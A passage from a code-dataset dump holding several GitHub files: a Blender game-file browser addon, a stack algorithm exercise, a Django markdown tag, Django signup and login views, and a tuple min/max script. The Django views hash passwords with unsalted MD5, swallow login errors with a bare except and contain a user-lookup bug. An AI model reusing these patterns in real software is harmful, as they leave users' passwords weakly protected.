PointerProperty,\n)\nimport bpy\n\nfrom plumber.importer import (\n DisableCommonPanel,\n GameFileImporterOperator,\n GameFileImporterOperatorProps,\n ImporterOperatorProps,\n update_recent_entries,\n)\n\nfrom .plumber import FileBrowser\nfrom .preferences import Game, AddonPreferences\n\n\nclass ObjectTransform3DSky(Operator):\n \"\"\"Transform the selected 3D sky objects, based on the active empty object\"\"\"\n\n bl_idname = \"object.plumber_transform_3d_sky\"\n bl_label = \"Transform VMF 3D sky\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n @classmethod\n def poll(cls, context: Context) -> bool:\n return (\n context.active_object and context.active_object.type == \"EMPTY\"\n ) and context.selected_objects\n\n def execute(self, context: Context) -> Set[str]:\n target = context.active_object\n for obj in context.selected_objects:\n if obj != target and obj.parent is None:\n obj.parent = target\n obj.location -= target.location\n target.location = (0, 0, 0)\n return {\"FINISHED\"}\n\n\ndef object_menu_func(self: bpy.types.Menu, context: bpy.types.Context) -> None:\n self.layout.separator()\n self.layout.operator(ObjectTransform3DSky.bl_idname)\n\n\nFILE_IMPORTERS = {\n \"mdl\": \"import_scene.plumber_mdl\",\n \"vmt\": \"import_scene.plumber_vmt\",\n \"vmf\": \"import_scene.plumber_vmf\",\n \"vtf\": \"import_scene.plumber_vtf\",\n}\n\n\ndef create_operator_fn(path: str):\n [category_name, name] = path.split(\".\")\n category = getattr(bpy.ops, category_name)\n return lambda: getattr(category, name)\n\n\nFILE_IMPORTER_OPERATORS = {\n f\".{ext}\": create_operator_fn(path) for ext, path in FILE_IMPORTERS.items()\n}\n\n\ndef get_extension(filename: str) -> str:\n parts = filename.rsplit(\".\", 1)\n if len(parts) < 2:\n return \"\"\n else:\n return parts[1]\n\n\nclass DirEntry(PropertyGroup):\n name: StringProperty(subtype=\"FILE_NAME\")\n path: StringProperty()\n kind: EnumProperty(\n items=(\n (\"DIR\", \"Directory\", \"\", \"FILE_FOLDER\", 0),\n (\"FILE\", \"File\", \"\", \"FILE\", 1),\n ),\n name=\"Type\",\n )\n\n def navigate(self, browser: \"GameFileBrowser\") -> bool:\n if self.kind == \"DIR\":\n if browser.path:\n browser.path += f\"/{self.name}\"\n else:\n browser.path = self.name\n else:\n return False\n return True\n\n\nclass DirEntryList(UIList):\n bl_idname = \"PLUMBER_UL_dir_entry_list\"\n\n use_filter_supported: BoolProperty(\n name=\"Filter supported\",\n default=True,\n options=set(),\n description=\"Whether to only show files that can be imported\",\n )\n\n filter_name: StringProperty(\n name=\"Filter name\",\n default=\"\",\n options=set(),\n description=\"Only show entries which match a specified pattern\",\n )\n\n def draw_item(\n self,\n context: Context,\n layout: UILayout,\n data: \"GameFileBrowser\",\n item: DirEntry,\n icon: int,\n active_data: int,\n active_propname: str,\n index: int,\n ) -> None:\n icon_value = layout.enum_item_icon(item, \"kind\", item.kind)\n\n if self.layout_type in {\"DEFAULT\", \"COMPACT\"}:\n split = layout.split(factor=0.6)\n\n split.label(\n text=item.name,\n icon_value=icon_value,\n )\n\n if index == getattr(active_data, active_propname) and item.kind == \"FILE\":\n extension = get_extension(item.name)\n importer = FILE_IMPORTERS.get(extension)\n\n if importer is not None:\n operator = split.operator(importer, text=\"Import\")\n operator.from_game_fs = True\n operator.filepath = item.path\n operator.game = str(data.game_id)\n\n operator: ExtractGameFile = split.operator(\n ExtractGameFile.bl_idname, text=\"Extract\"\n )\n operator.from_game_fs = True\n operator.source_path = item.path\n operator.game = str(data.game_id)\n operator.filename_ext = extension\n operator.filename = item.name\n\n elif self.layout_type in {\"GRID\"}:\n layout.alignment = \"CENTER\"\n layout.label(text=item.name, icon_value=icon_value)\n\n def draw_filter(self, context: Context, layout: UILayout):\n row = layout.row()\n row.prop(self, \"filter_name\", text=\"\", icon=\"VIEWZOOM\")\n row.prop(self, \"use_filter_supported\")\n\n def filter_items(self, context: Context, data: \"GameFileBrowser\", property: str):\n entries: Collection[DirEntry] = getattr(data, property)\n\n flt_flags = []\n flt_neworder = []\n\n filter_funcs = []\n\n if self.use_filter_supported:\n filter_funcs.append(\n lambda entry: (\n entry.kind != \"FILE\" or get_extension(entry.name) in FILE_IMPORTERS\n )\n )\n\n if self.filter_name:\n filter = self.filter_name.lower()\n filter_funcs.append(lambda entry: filter in entry.name.lower())\n\n if len(filter_funcs) != 0:\n flt_flags = [\n self.bitflag_filter_item\n if all(filter_func(entry) for filter_func in filter_funcs)\n else 0\n for entry in entries\n ]\n\n return flt_flags, flt_neworder\n\n\nclass RecentEntry(PropertyGroup):\n name: StringProperty(subtype=\"FILE_NAME\")\n path: StringProperty()\n\n\nclass RecentEntryList(UIList):\n bl_idname = \"PLUMBER_UL_recent_entry_list\"\n\n def draw_item(\n self,\n context: Context,\n layout: UILayout,\n data: \"GameFileBrowser\",\n item: DirEntry,\n icon: int,\n active_data: int,\n active_propname: str,\n index: int,\n ) -> None:\n if self.layout_type in {\"DEFAULT\", \"COMPACT\"}:\n layout.label(text=item.name, icon=\"FILE_FOLDER\")\n\n elif self.layout_type in {\"GRID\"}:\n layout.alignment = \"CENTER\"\n layout.label(text=item.name, icon=\"FILE_FOLDER\")\n\n def draw_filter(self, context: Context, layout: UILayout):\n pass\n\n\nclass GameRecentEntriesItem(PropertyGroup):\n name: StringProperty()\n\n recent_entries: CollectionProperty(type=RecentEntry)\n\n\nclass GameFileBrowser:\n browser: Optional[FileBrowser] = None\n path: str\n\n def __init_subclass__(cls) -> None:\n # unfortunately the self passed to property updates\n # is not a proper class instance of operators,\n # so we need to make update_path browser reading\n # not dependent on self\n\n def update_path(self: GameFileBrowser, context: Context):\n if isabs(self.path):\n self.path = \"\"\n return\n\n normalized = self.path.replace(\"\\\\\", \"/\").rstrip(\"/\")\n if self.path != normalized:\n self.path = normalized\n return\n\n entries = cls.browser.read_dir(self.path)\n self.entries.clear()\n\n for entry in entries:\n bl_entry: DirEntry = self.entries.add()\n bl_entry.name = entry.name()\n bl_entry.kind = entry.kind()\n bl_entry.path = f\"{self.path}/{bl_entry.name}\"\n\n self.entry_index = -1\n\n if len(entries) == 0:\n for ext, get_operator in FILE_IMPORTER_OPERATORS.items():\n if self.path.endswith(ext):\n get_operator()(\n \"INVOKE_DEFAULT\",\n from_game_fs=True,\n filepath=self.path,\n game=str(self.game_id),\n )\n self.path = dirname(self.path)\n return\n\n cls.update_path = update_path\n cls.__annotations__[\"path\"] = StringProperty(name=\"Path\", update=update_path)\n\n game_id: IntProperty(default=-1)\n\n entries: CollectionProperty(type=DirEntry)\n\n def update_entry_index(self, context: Context):\n if self.entry_index != -1:\n entry: DirEntry = self.entries[self.entry_index]\n if entry.navigate(self):\n self.entry_index = -1\n\n entry_index: IntProperty(\n default=-1,\n name=\"Directory entry\",\n update=update_entry_index,\n )\n\n def update_browse_parent(self, context: Context):\n if self.browse_parent:\n path = self.path\n parts = path.rsplit(\"/\", 1)\n if len(parts) < 2:\n self.path = \"\"\n else:\n self.path = parts[0]\n\n self.browse_parent = False\n\n browse_parent: BoolProperty(\n default=False,\n name=\"Parent\",\n update=update_browse_parent,\n )\n\n recent_entries_temp: CollectionProperty(type=RecentEntry)\n\n def update_recent_entry_index(self, context: Context):\n if self.recent_entry_index != -1:\n entry: RecentEntry = self.recent_entries_temp[self.recent_entry_index]\n self.path = entry.path\n self.recent_entry_index = -1\n\n recent_entry_index: IntProperty(\n default=-1,\n name=\"Recent entry\",\n update=update_recent_entry_index,\n )\n\n def open_game(self, context: Context):\n preferences: AddonPreferences = context.preferences.addons[\n __package__\n ].preferences\n\n game: Game = preferences.games[self.game_id]\n type(self).browser = game.get_file_system().browse()\n\n self.update_path(context)\n\n self.recent_entries_temp.clear()\n recent_entries: GameRecentEntriesItem = (\n context.scene.plumber_recent_entries.get(str(self.game_id))\n )\n if recent_entries is not None:\n recent_entry: RecentEntry\n for recent_entry in recent_entries.recent_entries:\n recent_entry_temp: RecentEntry = self.recent_entries_temp.add()\n recent_entry_temp.name = recent_entry.name\n recent_entry_temp.path = recent_entry.path\n\n def draw_browser(self, layout: UILayout):\n layout.label(text=\"Files:\")\n row = layout.row()\n\n button_layout = row.column()\n button_layout.enabled = bool(self.path)\n button_layout.prop(self, \"browse_parent\", icon=\"FILE_PARENT\", icon_only=True)\n\n row.prop(self, \"path\", text=\"\")\n\n layout.template_list(\n DirEntryList.bl_idname,\n \"\",\n self,\n \"entries\",\n self,\n \"entry_index\",\n rows=15,\n maxrows=15,\n )\n\n operator: ExtractGameDirectory = layout.operator(\n ExtractGameDirectory.bl_idname, text=\"Extract all\"\n )\n operator.from_game_fs = True\n operator.source_path = self.path\n operator.game = str(self.game_id)\n\n if self.entry_index == -1:\n layout.label(text=\"(select a file to import)\")\n else:\n layout.label(text=\"\")\n\n layout.separator()\n layout.label(text=\"Recent directories:\")\n layout.template_list(\n RecentEntryList.bl_idname,\n \"\",\n self,\n \"recent_entries_temp\",\n self,\n \"recent_entry_index\",\n rows=10,\n maxrows=10,\n sort_reverse=True,\n sort_lock=True,\n )\n\n\nclass GameFileBrowserPropertyGroup(PropertyGroup, GameFileBrowser):\n def update_game(self, context: Context):\n if self.game == \"NONE\":\n GameFileBrowserPropertyGroup.browser = None\n else:\n self.initialize(context)\n\n game: EnumProperty(\n items=AddonPreferences.game_enum_items,\n name=\"Game\",\n description=\"Used for opening required assets\",\n options={\"HIDDEN\"},\n update=update_game,\n )\n\n def initialize(self, context: Context):\n if self.game == \"NONE\":\n return\n else:\n self.game_id = int(self.game)\n self.open_game(context)\n\n def draw_browser(self, layout: UILayout):\n layout.prop(self, \"game\")\n\n if self.game == \"NONE\":\n return\n\n if GameFileBrowserPropertyGroup.browser is None:\n layout.operator(OpenGameFileBrowser.bl_idname)\n return\n\n super().draw_browser(layout)\n\n\nclass GameFileBrowserPanel(Panel):\n bl_idname = \"VIEW3D_PT_plumber_browser\"\n bl_category = \"Plumber\"\n bl_label = \"Game file browser\"\n bl_space_type = \"VIEW_3D\"\n bl_region_type = \"UI\"\n\n browser: GameFileBrowserPropertyGroup = None\n\n def draw(self, context: Context):\n if GameFileBrowserPanel.browser != context.scene.plumber_browser:\n # if scene changed, delete the previous browser\n GameFileBrowserPanel.browser = context.scene.plumber_browser\n GameFileBrowserPropertyGroup.browser = None\n\n GameFileBrowserPanel.browser.draw_browser(self.layout)\n\n\nclass OpenGameFileBrowser(Operator):\n \"\"\"Open the game file browser\"\"\"\n\n bl_idname = \"view3d.plumber_open_file_browser\"\n bl_label = \"Open\"\n bl_options = {\"INTERNAL\"}\n\n def execute(self, context: Context) -> Set[str]:\n GameFileBrowserPanel.browser.initialize(context)\n return {\"FINISHED\"}\n\n\nclass GameFileBrowserOperator(Operator, GameFileBrowser):\n \"\"\"Browse the files of the selected game\"\"\"\n\n bl_idname = \"import_scene.plumber_file_browser\"\n bl_label = \"Browse game files\"\n bl_options = {\"INTERNAL\"}\n\n def invoke(self, context: Context, event) -> Set[str]:\n if self.game_id == -1:\n return {\"CANCELLED\"}\n\n self.open_game(context)\n\n update_recent_entries.browser_operator_entries = self.recent_entries_temp\n\n return context.window_manager.invoke_props_dialog(self)\n\n def draw(self, context: Context):\n self.draw_browser(self.layout)\n\n def execute(self, context: Context) -> Set[str]:\n update_recent_entries.browser_operator_entries = None\n return {\"CANCELLED\"}\n\n\nclass IMPORT_MT_plumber_browse(Menu):\n bl_idname = \"IMPORT_MT_plumber_browse\"\n bl_label = \"Browse game files\"\n\n def draw(self, context: Context):\n preferences: AddonPreferences = context.preferences.addons[\n __package__\n ].preferences\n\n for i, game in enumerate(preferences.games):\n self.layout.operator(\n GameFileBrowserOperator.bl_idname,\n text=game.name,\n ).game_id = i\n\n\nclass ExtractGameDirectory(\n GameFileImporterOperator,\n ImporterOperatorProps,\n GameFileImporterOperatorProps,\n DisableCommonPanel,\n):\n \"\"\"Extract a game directory\"\"\"\n\n bl_idname = \"file.plumber_extract_directory\"\n bl_label = \"Extract game files\"\n bl_options = {\"INTERNAL\"}\n\n source_path: StringProperty(options={\"HIDDEN\"})\n\n directory: StringProperty(options={\"HIDDEN\"})\n filepath: None\n filename_ext = \".\"\n use_filter_folder = True\n\n def invoke(self, context: Context, event) -> Set[str]:\n if not self.from_game_fs:\n return {\"CANCELLED\"}\n\n update_recent_entries(context, self.game, self.source_path)\n\n context.window_manager.fileselect_add(self)\n return {\"RUNNING_MODAL\"}\n\n def execute(self, context: Context) -> Set[str]:\n fs = self.get_game_fs(context)\n\n try:\n fs.extract(self.source_path, True, self.directory)\n except OSError as err:\n self.report({\"ERROR\"}, f\"could not export: {err}\")\n return {\"CANCELLED\"}\n\n return {\"FINISHED\"}\n\n\nclass ExtractGameFile(\n GameFileImporterOperator,\n ImporterOperatorProps,\n GameFileImporterOperatorProps,\n DisableCommonPanel,\n):\n \"\"\"Extract a game file\"\"\"\n\n bl_idname = \"file.plumber_extract_file\"\n bl_label = \"Extract game file\"\n bl_options = {\"INTERNAL\"}\n\n source_path: StringProperty(options={\"HIDDEN\"})\n\n filename: StringProperty(options={\"HIDDEN\"})\n check_existing: BoolProperty(options={\"HIDDEN\"}, default=True)\n filename_ext: StringProperty(options={\"HIDDEN\"})\n\n def invoke(self, context: Context, event) -> Set[str]:\n if not self.from_game_fs:\n return {\"CANCELLED\"}\n\n update_recent_entries(context, self.game, dirname(self.source_path))\n\n context.window_manager.fileselect_add(self)\n return {\"RUNNING_MODAL\"}\n\n def execute(self, context: Context) -> Set[str]:\n fs = self.get_game_fs(context)\n\n try:\n fs.extract(self.source_path, False, self.filepath)\n except OSError as err:\n self.report({\"ERROR\"}, f\"could not export: {err}\")\n return {\"CANCELLED\"}\n\n return {\"FINISHED\"}\n\n\nclasses = [\n ObjectTransform3DSky,\n DirEntry,\n DirEntryList,\n RecentEntry,\n RecentEntryList,\n GameRecentEntriesItem,\n GameFileBrowserPropertyGroup,\n OpenGameFileBrowser,\n GameFileBrowserOperator,\n IMPORT_MT_plumber_browse,\n ExtractGameDirectory,\n ExtractGameFile,\n]\n\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n\n bpy.types.VIEW3D_MT_object.append(object_menu_func)\n\n bpy.types.Scene.plumber_browser = PointerProperty(\n type=GameFileBrowserPropertyGroup, options={\"SKIP_SAVE\"}\n )\n bpy.types.Scene.plumber_recent_entries = CollectionProperty(\n type=GameRecentEntriesItem, options=set()\n )\n\n preferences: AddonPreferences = bpy.context.preferences.addons[\n __package__\n ].preferences\n\n if preferences.enable_file_browser_panel:\n bpy.utils.register_class(GameFileBrowserPanel)\n\n\ndef unregister():\n preferences: AddonPreferences = bpy.context.preferences.addons[\n __package__\n ].preferences\n\n if preferences.enable_file_browser_panel:\n bpy.utils.unregister_class(GameFileBrowserPanel)\n\n del bpy.types.Scene.plumber_recent_entries\n del bpy.types.Scene.plumber_browser\n\n bpy.types.VIEW3D_MT_object.remove(object_menu_func)\n\n for cls in reversed(classes):\n bpy.utils.unregister_class(cls)\n","repo_name":"lasa01/Plumber","sub_path":"plumber/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":18495,"program_lang":"python","lang":"en","doc_type":"code","stars":324,"dataset":"github-code","pt":"40"} +{"seq_id":"21691805838","text":"import sys\nn = int(input())\nnums = list(map(int, sys.stdin.readline().split()))\n\nstack = []\nnums.reverse() # 뒤에서 부터 담을거임\nans = []\n\nfor i in range(n):\n while stack and stack[-1]<=nums[i]: # 스택 top이 나보다 작거나 같으면 pop, 나보다 큰 수 나오면 멈춤\n stack.pop()\n\n if stack: # 스택에 뭐가 남아있으면 그게 나랑 가장 가까운 큰 수\n ans.append(stack[-1])\n else: # 아무것도 없으면 내가 제일 큰 수\n ans.append(-1)\n stack.append(nums[i])\n\nans.reverse()\nprint(*ans)","repo_name":"thing-zoo/algorithm-study","sub_path":"BOJ/seeun/4. 스택/17298_오큰수(내가 품).py","file_name":"17298_오큰수(내가 품).py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1845219872","text":"from django import template\nimport markdown\n\nregister = template.Library()\n\n\nclass MarkdownNode(template.Node):\n def __init__(self, nodelist):\n self.nodelist = nodelist\n\n def render(self, context):\n output = self.nodelist.render(context)\n output = markdown.markdown(\n output, extensions=[\"toc\"], extension_configs={\"toc\": {\"anchorlink\": True}}\n )\n return output\n\n\n@register.tag(name=\"markdown\")\ndef do_markdown(parser, token):\n nodelist = parser.parse((\"endmarkdown\",))\n parser.delete_first_token()\n return MarkdownNode(nodelist)\n","repo_name":"hkhanna/django-base","sub_path":"core/templatetags/markdown.py","file_name":"markdown.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22120478797","text":"from django.shortcuts import render, redirect\nfrom BlogApp.forms import *\nfrom BlogApp.models import *\nimport random, hashlib, socket, platform\nfrom django.contrib import messages\nfrom django.conf import settings\nfrom django.core.mail import send_mail\n\n\ndef signup(request):\n if request.method == \"POST\":\n user_form = UserForm(request.POST)\n name_form = NameForm(request.POST)\n gender_form = GenderForm(request.POST)\n bd_form = BirthDayForm(request.POST)\n\n if user_form.is_valid() and name_form.is_valid() and gender_form.is_valid() and bd_form.is_valid():\n name = name_form.cleaned_data['fname']\n surname = name_form.cleaned_data['lname']\n NameTable.objects.create(fname=name, lname=surname)\n name_ref = NameTable.objects.filter(fname=name, lname=surname).last()\n\n gender = gender_form.cleaned_data['gender']\n GenderTable.objects.create(gender=gender)\n gender_ref = GenderTable.objects.filter(gender=gender).last()\n\n birthday = bd_form.cleaned_data['birthday']\n birthmonth = bd_form.cleaned_data['birthmonth']\n birthyear = bd_form.cleaned_data['birthyear']\n BirthdayTable.objects.create(birthday=birthday, birthmonth=birthmonth, birthyear=birthyear)\n bd_ref = BirthdayTable.objects.filter(birthday=birthday, birthmonth=birthmonth, birthyear=birthyear).last()\n\n email = user_form.cleaned_data['email']\n psd = user_form.cleaned_data['confirm_password']\n password = hashlib.md5(psd.encode()).hexdigest()\n email_verification_code = random.randint(10000,1000000)\n\n ProfilePhotoTable.objects.create(profile_photo=\"default\")\n pp_ref = ProfilePhotoTable.objects.filter(profile_photo=\"default\").last()\n\n device_name = socket.gethostname()\n ip_address = socket.gethostbyname(socket.gethostname())\n current_os = platform.platform()\n os_quality = platform.system()\n machine_type = platform.machine()\n device_details = platform.uname()\n\n DeviceDetailsTable.objects.create(device_name=device_name, ip_address=ip_address, current_os=current_os, os_quality=os_quality, machine_type=machine_type, device_details=device_details)\n\n device_ref = DeviceDetailsTable.objects.filter(device_name=device_name, ip_address=ip_address, current_os=current_os, os_quality=os_quality, machine_type=machine_type, device_details=device_details).last()\n\n name_obj = NameTable.objects.get(id=name_ref.id)\n gender_obj = GenderTable.objects.get(id=gender_ref.id)\n bd_obj = BirthdayTable.objects.get(id=bd_ref.id)\n pp_obj = ProfilePhotoTable.objects.get(id=pp_ref.id)\n device_obj = DeviceDetailsTable.objects.get(id=device_ref.id)\n\n UserTable.objects.create(email_address = email, email_verification_code = email_verification_code, password=password, name_table = name_obj, gender_table=gender_obj, birthday_table = bd_obj, profile_completion = 40, pp_table=pp_obj, device_table=device_obj)\n\n subject = \"Demo App Email Verification Code.\"\n sender = settings.EMAIL_HOST_USER\n receiver = [[email], ]\n body = f\"Hello {name} {surname},\\nWelcome to my demo testing web application. Thanks for your kind interest and help me to test the app performance.\\nYour demo app verification code is {email_verification_code}. Don't share this code with others for your account safety.\\nThanks, Engr. Shaumik Ghosh.\"\n send_mail(subject, body, sender, receiver)\n\n msg = f\"Hello {name} {surname}, An email verification code has been sent to your email from {sender}. Check your email and collect the code with 6 digits then verify your email. Thanks.\"\n\n MessageTable.objects.create(message=msg)\n msg_ref = MessageTable.objects.filter(message=msg).last()\n msg_obj = MessageTable.objects.get(id=msg_ref.id)\n\n user = UserTable.objects.get(email_address=email)\n user.msg_tabl = msg_obj\n user.save()\n\n request.session['id'] = user.id\n request.session['name'] = user.name_table.fname+\" \"+user.name_table.lname\n request.session['email'] = email\n request.session['email_validity'] = user.email_validity\n request.session['user_activity'] = user.user_activity\n request.session['rcver_mail'] = receiver[0][0]\n request.session['sender_mail'] = sender\n request.session['profile_completion'] = user.profile_completion\n request.session['gender'] = user.gender_table.gender\n request.session['pp'] = str(user.pp_table.profile_photo)\n request.session['slug_name'] = user.name_table.slug_name\n request.session['message'] = user.msg_tabl.message\n\n return redirect('profile')\n else:\n print(user_form.errors, name_form.errors, gender_form.errors, bd_form.errors)\n return render(request, 'frontend/public/signup/signup.html', {'user_form':user_form, 'name_form':name_form, 'gender_form':gender_form, 'bd_form':bd_form})\n else:\n user_form = UserForm()\n name_form = NameForm()\n gender_form = GenderForm()\n bd_form = BirthDayForm()\n return render(request, 'frontend/public/signup/signup.html', {'user_form':user_form, 'name_form':name_form, 'gender_form':gender_form, 'bd_form':bd_form})\n\n\n\ndef profile(request):\n if request.method == \"POST\":\n code = EmailConfirmCode(request.POST)\n address = AddressForm(request.POST)\n imgform = UploadImage(request.POST, request.FILES)\n postForm = PostForm(request.POST, request.FILES)\n\n if code.is_valid():\n user_id = request.POST['id']\n code = code.cleaned_data['code']\n user = UserTable.objects.get(id=user_id)\n if user.email_verification_code.__eq__(code):\n msg = f\"Hello {user.name_table.fname} {user.name_table.lname}, Your email is successfully verified! Your account completed {user.profile_completion}%. Sorry to inform you, Settings and ViewProfile won't be activated till 100% profile completion. Thanks.\"\n\n MessageTable.objects.create(message=msg)\n msg_ref = MessageTable.objects.filter(message=msg).last()\n msg_obj = MessageTable.objects.get(id=msg_ref.id)\n user.email_validity = 1\n user.msg_tabl = msg_obj\n user.save()\n\n request.session['id'] = user.id\n request.session['name'] = user.name_table.fname + \" \" + user.name_table.lname\n request.session['email'] = user.email_address\n request.session['email_validity'] = user.email_validity\n request.session['user_activity'] = user.user_activity\n request.session['profile_completion'] = user.profile_completion\n request.session['gender'] = user.gender_table.gender\n request.session['pp'] = str(user.pp_table.profile_photo)\n request.session['slug_name'] = user.name_table.slug_name\n request.session['message'] = user.msg_tabl.message\n\n return redirect('profile')\n else:\n code = EmailConfirmCode()\n messages.error(request, \"Verification code didn't match\", {'form': code})\n else:\n print(code.errors)\n\n if address.is_valid():\n user_id = request.POST['id']\n vlg = address.cleaned_data['village']\n cty = address.cleaned_data['city']\n zp = address.cleaned_data['zip']\n cntry = address.cleaned_data['country']\n AddressTable.objects.create(village=vlg, city=cty, zip=zp, country=cntry)\n address_ref = AddressTable.objects.filter(village=vlg, city=cty, zip=zp, country=cntry).last()\n\n user = UserTable.objects.get(id=user_id)\n adrst = AddressTable.objects.get(id=address_ref.id)\n\n user.address_table = adrst\n user.profile_completion = 80\n\n msg = f\"Thanks {user.name_table.fname} {user.name_table.lname}, last process was done successfully! Your account completed {user.profile_completion}%, You may upload your photo or skip this step to complete yout profile 100%. Sorry to inform you, Settings and ViewProfile won't be activated till 100% profile completion.\"\n\n MessageTable.objects.create(message=msg)\n msg_ref = MessageTable.objects.filter(message=msg).last()\n msg_obj = MessageTable.objects.get(id=msg_ref.id)\n\n user.msg_tabl = msg_obj\n user.save()\n\n request.session['id'] = user.id\n request.session['name'] = user.name_table.fname + \" \" + user.name_table.lname\n request.session['email'] = user.email_address\n request.session['email_validity'] = user.email_validity\n request.session['user_activity'] = user.user_activity\n request.session['profile_completion'] = user.profile_completion\n request.session['gender'] = user.gender_table.gender\n request.session['pp'] = str(user.pp_table.profile_photo)\n request.session['slug_name'] = user.name_table.slug_name\n request.session['message'] = user.msg_tabl.message\n\n return redirect('profile')\n else:\n print(address.errors)\n\n if imgform.is_valid():\n user_id = request.POST['id']\n image = imgform.cleaned_data['upimage']\n img = ProfilePhotoTable(\n profile_photo=image\n )\n img.save()\n image_ref = ProfilePhotoTable.objects.filter(profile_photo=image).last()\n image_obj = ProfilePhotoTable.objects.get(id=image_ref.id)\n\n user = UserTable.objects.get(id=user_id)\n user.pp_table = image_obj\n user.profile_completion = 100\n\n msg = f\"Thanks {user.name_table.fname} {user.name_table.lname}, Your account is {user.profile_completion}% completed. Therefore, Settings and ViewProfile is activated now. But your profile is under review. It will be reviewed manually. Once your profile is approved you will be able to create posts, like and comments.\"\n\n MessageTable.objects.create(message=msg)\n msg_ref = MessageTable.objects.filter(message=msg).last()\n msg_obj = MessageTable.objects.get(id=msg_ref.id)\n user.msg_tabl = msg_obj\n user.save()\n\n request.session['id'] = user.id\n request.session['name'] = user.name_table.fname + \" \" + user.name_table.lname\n request.session['email'] = user.email_address\n request.session['email_validity'] = user.email_validity\n request.session['user_activity'] = user.user_activity\n request.session['profile_completion'] = user.profile_completion\n request.session['gender'] = user.gender_table.gender\n request.session['pp'] = str(user.pp_table.profile_photo)\n request.session['slug_name'] = user.name_table.slug_name\n request.session['message'] = user.msg_tabl.message\n\n return redirect('profile')\n else:\n print(imgform.errors)\n\n return render(request, 'frontend/user/profile/profile.html', {'form': code, 'address':address, 'imgform':imgform, 'postForm':postForm})\n else:\n if request.session.has_key(\"id\"):\n code = EmailConfirmCode()\n address = AddressForm()\n imgform = UploadImage()\n postForm = PostForm()\n return render(request, 'frontend/user/profile/profile.html', {'form':code, 'address':address,'imgform':imgform, 'postForm':postForm})\n else:\n return redirect('login')\n\n\ndef resend_verification_code(request, name):\n name = NameTable.objects.get(slug_name=name)\n user = UserTable.objects.get(id=name.id)\n code = random.randint(10000,1000000)\n\n msg = f\"The email verification code has been resent to your email from {settings.EMAIL_HOST_USER}. Check your email and collect the code with 6 digits then verify your email. Thanks.\"\n\n MessageTable.objects.create(message=msg)\n msg_ref = MessageTable.objects.filter(message=msg).last()\n msg_obj = MessageTable.objects.get(id=msg_ref.id)\n user.msg_tabl = msg_obj\n user.email_verification_code = code\n user.save()\n\n subject = \"Demo App Email Verification Code.\"\n sender = settings.EMAIL_HOST_USER\n receiver = [[user.email_address], ]\n body = f\"Hello {user.name_table.fname} {user.name_table.lname},\\nWelcome to my demo testing web application. Thanks for your kind interest and help me to test the app performance.\\nYour demo app verification code is {code}. Don't share this code with others for your account safety.\\nThanks, Engr. Shaumik Ghosh.\"\n send_mail(subject, body, sender, receiver)\n\n request.session['id'] = user.id\n request.session['name'] = user.name_table.fname + \" \" + user.name_table.lname\n request.session['email'] = user.email_address\n request.session['email_validity'] = user.email_validity\n request.session['user_activity'] = user.user_activity\n request.session['profile_completion'] = user.profile_completion\n request.session['gender'] = user.gender_table.gender\n request.session['pp'] = str(user.pp_table.profile_photo)\n request.session['slug_name'] = user.name_table.slug_name\n request.session['message'] = user.msg_tabl.message\n\n return redirect('profile')\n\n\n\ndef skip_uploading_image(request, name):\n name = NameTable.objects.get(slug_name=name)\n user = UserTable.objects.get(id=name.id)\n\n user.profile_completion = 100\n\n msg = f\"Thanks {user.name_table.fname} {user.name_table.lname}, Your account is {user.profile_completion}% completed. Therefore, Settings and ViewProfile is activated now. But your profile is under review. It will be reviewed manually. Once your profile is approved you will be able to create posts, like and comments.\"\n\n MessageTable.objects.create(message=msg)\n msg_ref = MessageTable.objects.filter(message=msg).last()\n msg_obj = MessageTable.objects.get(id=msg_ref.id)\n\n user.msg_tabl = msg_obj\n user.save()\n\n request.session['id'] = user.id\n request.session['name'] = user.name_table.fname + \" \" + user.name_table.lname\n request.session['email'] = user.email_address\n request.session['email_validity'] = user.email_validity\n request.session['user_activity'] = user.user_activity\n request.session['profile_completion'] = user.profile_completion\n request.session['gender'] = user.gender_table.gender\n request.session['pp'] = str(user.pp_table.profile_photo)\n request.session['slug_name'] = user.name_table.slug_name\n request.session['message'] = user.msg_tabl.message\n\n messages.success(request, 'You have choiced to keep default profile Image. No problem you are allowed to change your profile picture browsing settings if wanna do in the future, Thanks.')\n\n return redirect('profile')\n\n\ndef login(request):\n if request.method==\"POST\":\n loginform = LoginForm(request.POST)\n if loginform.is_valid():\n try:\n given_email = loginform.cleaned_data['email']\n password = loginform.cleaned_data['password']\n given_password = hashlib.md5(password.encode()).hexdigest()\n lgn = UserTable.objects.get(email_address=given_email, password=given_password)\n\n if lgn.email_address.__eq__(given_email) and lgn.password.__eq__(given_password):\n request.session['id'] = lgn.id\n request.session['name'] = lgn.name_table.fname + \" \" + lgn.name_table.lname\n request.session['email'] = lgn.email_address\n request.session['email_validity'] = lgn.email_validity\n request.session['user_activity'] = lgn.user_activity\n request.session['profile_completion'] = lgn.profile_completion\n request.session['gender'] = lgn.gender_table.gender\n request.session['pp'] = str(lgn.pp_table.profile_photo)\n request.session['slug_name'] = lgn.name_table.slug_name\n request.session['message'] = lgn.msg_tabl.message\n\n return redirect('profile')\n except:\n messages.error(request, \"Email or Password Error!\")\n return redirect('login')\n else:\n print(loginform.errors)\n return render(request, 'frontend/public/login/login.html', {'form':loginform})\n else:\n loginform = LoginForm()\n return render(request, 'frontend/public/login/login.html', {'form':loginform})\n\n\ndef logout(request):\n request.session.clear()\n request.session.flush()\n return redirect('login')\n\n\n# python manage.py migrate","repo_name":"pramodkumarp/Django-Intern-Projects","sub_path":"DynamicApp/BlogApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33497997886","text":"\n\n# write a python program to print maximum and minimum number in tuple\n\nx=(12,32,64,15,16,27,38)\ny=list(x)\nk=y[0]\np=y[0]\nfor i in y:\n if i>k:\n k=i\nprint('maximum is:',k)\n\nfor i in y:\n if i<p:\n p=i\nprint('minimum is:',p)","repo_name":"Meghakt123/python_assignment_2","sub_path":"q8.py","file_name":"q8.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} 